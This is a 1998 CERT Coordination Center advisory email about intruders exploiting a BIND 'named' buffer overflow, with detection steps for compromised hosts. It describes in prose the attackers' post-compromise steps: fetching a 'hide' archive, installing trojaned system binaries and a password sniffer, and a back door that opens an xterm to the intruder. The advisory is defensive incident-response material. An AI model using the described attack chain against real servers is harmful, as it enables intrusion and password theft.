Date: Thu, 21 May 1998 15:34:28 -0400
From: CERT Advisory <[email protected]>
To: [email protected]Subject: CERT Summary CS-98.04
-----BEGIN PGP SIGNED MESSAGE-----
CERT* Summary CS-98.04 - SPECIAL EDITION
May 21, 1998
This special edition of the CERT Summary reports increasing attacks on
machines running "named" (domain name server software, part of BIND).
Past CERT Summaries are available from
ftp://ftp.cert.org/pub/cert_summaries/
- ---------------------------------------------------------------------------
The CERT Coordination Center has received reports of increasing
intruder activity indicating that intruders are targeting machines
running vulnerable versions of "named" (domain name server software
that is part of BIND). Many sites running unpatched, vulnerable
versions of "named" have been compromised.
We encourage you to review CERT Advisory CA-98.05, which describes the
BIND buffer overflow vulnerability that is being exploited, and to
apply the appropriate patches if you have not done so already. The
advisory is available at
http://www.cert.org/advisories/CA-98.05.bind_problems.html
Some operating system distributions have the vulnerable version of
"named" installed and enabled by default. When you are installing an
operating system on a machine, ensure that the version of the
operating system you use contains a patch for this problem; if your
operating system is vulnerable and does not contain a patch,
immediately apply the patch after you install the operating system.
For more information about which operating systems have vulnerable
versions of "named", see CA-98.05.
Increasing Intruder Activity
- ----------------------------
Intruders are increasingly scanning networks for machines running
vulnerable versions of "named". This increased activity in "named" is
consistent with trends we have seen with previous vulnerabilities; in
these cases, intruders have launched widespread scans to look for
machines running vulnerable IMAP servers or web servers with the "phf"
vulnerability, and then exploited the vulnerability on those machines.
While we have had many reported incidents involving the exploitation
of "named", at least one incident appears to involve widespread
attacks against authoritative domain name servers.
Description of Some Current Attacks
- -----------------------------------
In some incidents reported to us, it appears that after the "named"
server is compromised, the intruder runs a script that
- telnets to another host (potentially the host launching the
attack) on port 666
- obtains an intruder tool archive named "hide" via ncftp or ftp
- unpacks and installs the contents of the "hide" archive
This "hide" archive includes the following Trojan horse programs:
ifconfig
inetd
ls
named
netstat
ps
pstree
syslogd
tcpd
top
The Trojan horse "named" program appears to contain a back door that
allows the intruder to open an xterm window from the compromised host
back to the intruder's system. If any of the other Trojan horse
programs were installed, they cannot be relied upon to provide
accurate information about processes, network connections, or files
present on the system.
The "hide" archive also contains several other intruder tools and
configuration files including
/dev/reset
/dev/pmcf1
/dev/pmcf2
/dev/pmcf3
/dev/pmcf4
fix
The "/dev/reset" program appears to be a sniffer program that captures
and logs cleartext passwords transmitted over the local area
network. The "pmcf" files appear to be configuration files for the
Trojan horse programs mentioned above. "fix" is a program that is
used to install the Trojan horse programs on a compromised machine.
In cases where the intruders successfully installed the Trojan horse
programs, the "fix" program and the "hide" archive were deleted.
The binary programs in this particular archive have been compiled for
the Intel x86 architecture and the Linux operating system, but the
attack could easily be adapted to other systems.
Vulnerable "named" servers other than ones on Linux may abort and dump
core if an intruder attempts to use the specific exploit designed for
the Intel x86 architecture. This means that a core file for a domain
name server may indicate a specific failed attempt to compromise the
domain name server, but the domain name server could still be successfully
compromised with the use of a different intruder exploit script.
Look for Compromise on Your Systems
- -----------------------------------
To determine whether or not your system has been compromised by an
intruder, we encourage you to follow the steps identified in our
Intruder Detection Checklist, available at
ftp://ftp.cert.org/pub/tech_tips/intruder_detection_checklist
Suggestions for detecting this specific activity include
- Compare the MD5 checksums for the files listed above with the
MD5 checksums from versions that are known to be correct.
- Look for the sniffer program "/dev/reset", the "/dev/pmcf*"
configuration files and the sniffer output file, which in many
incidents has been "/usr/lib/libsn.a".
- Check to see if your system log contains messages like
May 1 11:28:49 named[28464]: starting. named
LOCAL-980501.020913 Fri May 1 02:09:13 EDT 1998
^Iroot@:/usr/lib/tntbot/bind/named
This message may indicate that you are running a Trojan horse
version of "named".
- Investigate any unexpected crashes or restarts of the named and
"inetd" daemons occurring recently, especially since April 27,
1998. The intruder's installation script kills these daemons
and then restarts them with the new Trojan horse versions.
- Examine core dumps from recently crashed "named" servers. Some of
the sites attacked have reported that their core files contain
portions of the exploit script used in this attack. Sites that have
reported such crashes appear to be running operating systems other
than Linux. In these cases, it is possible that the intruder was
not successful in compromising the machine. However, the "named"
server is still potentially vulnerable and could be compromised
successfully in a different attempt.
- The .ncftp file in root's home directory may contain information
showing unexpected ftp file transfers.
If you determine that your systems may have been root compromised as a result
of this activity, we encourage you to refer to the "Recovering from an
Incident" web page available at
http://www.cert.org/nav/recovering.html
- ---------------------------------------------------------------------------
How to Contact the CERT Coordination Center
Email [email protected]
Phone +1 412-268-7090 (24-hour hotline)
CERT personnel answer on business days
8:30-5:00 p.m. EST (GMT-5)/EDT(GMT-4),
and are on call for emergencies during
other hours.
Fax +1 412-268-6989
Postal address
CERT Coordination Center
Software Engineering Institute
Carnegie Mellon University
Pittsburgh PA 15213-3890
USA
To be added to our mailing list for CERT advisories and bulletins, send your
email address to
[email protected]
In the subject line, type
SUBSCRIBE your-email-address
CERT advisories and bulletins are posted on the USENET news group
comp.security.announce
CERT publications, information about FIRST representatives, and other
security-related information are available for anonymous FTP from
http://www.cert.org/ftp://ftp.cert.org/pub/
If you wish to send sensitive incident or vulnerability information to CERT
staff by electronic mail, we strongly advise you to encrypt your message.
We can support a shared DES key or PGP. Contact the CERT staff for more
information.
Location of CERT PGP key
ftp://ftp.cert.org/pub/CERT_PGP.key
- ---------------------------------------------------------------------------
Copyright 1998 Carnegie Mellon University. Conditions for use, disclaimers,
and sponsorship information can be found in
http://www.cert.org/legal_stuff.html and ftp://ftp.cert.org/pub/legal_stuff .
If you do not have FTP or web access, send mail to [email protected] with
"copyright" in the subject line.
* CERT is registered in the U.S. Patent and Trademark Office.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
iQCVAwUBNWR4gnVP+x0t4w7BAQF/wQP/QxT1ZApG3SLWndRQ0svlEFV5OVo22bWX
H+61HPAn7h5dLsk1hMzer5Nvi1SpOT2aT9gFtb4tTHiaJ/E9NazWB2QBSXNDhMEz
p5+rbSiPvEsbRjysRQhzaG6GC2bib7tsaozGUka/XAKEjtJeJxzlZk++9AFkvtMp
QQzljs3cPd4=
=iQy0
-----END PGP SIGNATURE-----